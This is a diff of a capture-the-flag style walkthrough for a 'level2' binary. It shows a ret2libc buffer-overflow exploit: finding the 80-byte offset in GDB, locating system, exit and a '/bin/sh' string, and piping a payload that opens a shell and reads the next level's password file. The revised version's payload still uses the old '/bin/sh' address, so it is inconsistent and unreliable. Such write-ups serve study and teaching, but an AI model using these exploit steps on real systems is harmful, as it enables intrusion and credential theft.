level2/walkthrough.md, before:

# Level 2

We found two methods here :

## Methode 1: ret2Libc

First, we have to check if there is an overflow and where.
```sh
$ python ../tools/pattern.py 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
```

Let's start GDB and launch our program with this pattern
```sh
$ gdb -q ./level2 
Reading symbols from /home/user/level2/level2...(no debugging symbols found)...done.
(gdb) r <<< Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /home/user/level2/level2 <<< Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A6Ac72Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()
```

The program crash with 0x37634136 in final value, it's out point of entry. Now we can find the size of the buffer crashing the program.
```sh
$ python pattern.py --crash 37634136   
Buffer crashed at size: 80
```
We have our offset, let's try to do a ret2libc exploit. It concist in adding function call of libc at the end in the EIP register.
We are going to call the system function with /bin/sh as argument lets find thoses addresses with GDB.
We also need exit to leave properly and the return address of the main

```sh
$ gdb -q ./level2 
Reading symbols from /home/user/level2/level2...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048542
(gdb) r
Starting program: /home/user/level2/level2 

Breakpoint 1, 0x08048542 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7e6b060 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7e5ebe0 <exit>
(gdb) find system, +9999999, "/bin/sh"
0xb7f8cc58
(gdb) disass
Dump of assembler code for function main:
   0x0804853f <+0>:		push   %ebp
   0x08048540 <+1>:		mov    %esp,%ebp
=> 0x08048542 <+3>:		and    $0xfffffff0,%esp
   0x08048545 <+6>:		call   0x80484d4 <p>
   0x0804854a <+11>:	leave  
   0x0804854b <+12>:	ret  
End of assembler dump.
```

A little resume of the situation:
```
ret address: 0x0804854b
system address: 0xb7e6b060
exit address: 0xb7e5ebe0
/bin/sh address: 0xb7f8cc58
```

Now, it's time for the exploit :D


```sh
$ (python -c 'print("A" * 80 + "\x4b\x85\x04\x08" + "\x60\xb0\xe6\xb7" + "\xe0\xeb\xe5\xb7" + "\x58\xcc\xf8\xb7")'; cat) | ./level2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAK`�����X���
whoami
level3
cat /home/user/level3/.pass
```

Sources:<br>
[0xRick's Blog](https://0xrick.github.io/binary-exploitation/bof6/)<br>
[hackndo](https://beta.hackndo.com/retour-a-la-libc/)<br>
[CTF101](https://ctf101.org/binary-exploitation/buffer-overflow/)<br>
[0x0ff.info](https://www.0x0ff.info/2015/buffer-overflow-gdb-part-2/)<br>

Commit message:

add simple way to get string in env

level2/walkthrough.md, after:

# Level 2

We found two methods here :

## Methode 1: ret2Libc

First, we have to check if there is an overflow and where.
```sh
$ python ../tools/pattern.py 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
```

Let's start GDB and launch our program with this pattern
```sh
$ gdb -q ./level2 
Reading symbols from /home/user/level2/level2...(no debugging symbols found)...done.
(gdb) r <<< Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /home/user/level2/level2 <<< Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A6Ac72Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()
```

The program crash with 0x37634136 in final value, it's out point of entry. Now we can find the size of the buffer crashing the program.
```sh
$ python pattern.py --crash 37634136   
Buffer crashed at size: 80
```
We have our offset, let's try to do a ret2libc exploit. It concist in adding function call of libc at the end in the EIP register.
We are going to call the system function with /bin/sh as argument lets find thoses addresses with GDB.
We also need exit to leave properly and the return address of the main

```sh
$ gdb -q ./level2 
Reading symbols from /home/user/level2/level2...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048542
(gdb) r
Starting program: /home/user/level2/level2 

Breakpoint 1, 0x08048542 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7e6b060 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7e5ebe0 <exit>
(gdb) disass
Dump of assembler code for function main:
   0x0804853f <+0>:		push   %ebp
   0x08048540 <+1>:		mov    %esp,%ebp
=> 0x08048542 <+3>:		and    $0xfffffff0,%esp
   0x08048545 <+6>:		call   0x80484d4 <p>
   0x0804854a <+11>:	leave  
   0x0804854b <+12>:	ret  
End of assembler dump.
```
We also have to find a string containing "/bin/sh", for this we will be helped by the environment:
```sh
$ export HACK=/bin/sh
$ /tmp/getenvaddr HACK ./level2
HACK will be at 0xbffff91d
```

A little resume of the situation:
```
offset:           80
ret address:      0x0804854b
system address:   0xb7e6b060
exit address:     0xb7e5ebe0
/bin/sh address:  0xbffff91d
```

Now, it's time for the exploit :D<br>
`[ OFFSET ] [ RETURN ADDRESS ] [ SYSTEM ADDRESS ] [ EXIT ADDRESS ] [ ARGS ADDRESS ]`

```sh
$ (python -c 'print("A" * 80 + "\x4b\x85\x04\x08" + "\x60\xb0\xe6\xb7" + "\xe0\xeb\xe5\xb7" + "\x58\xcc\xf8\xb7")'; cat) | ./level2
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAK`�����X���
whoami
level3
cat /home/user/level3/.pass
```

Sources:<br>
[0xRick's Blog](https://0xrick.github.io/binary-exploitation/bof6/)<br>
[hackndo](https://beta.hackndo.com/retour-a-la-libc/)<br>
[CTF101](https://ctf101.org/binary-exploitation/buffer-overflow/)<br>
[0x0ff.info](https://www.0x0ff.info/2015/buffer-overflow-gdb-part-2/)<br>
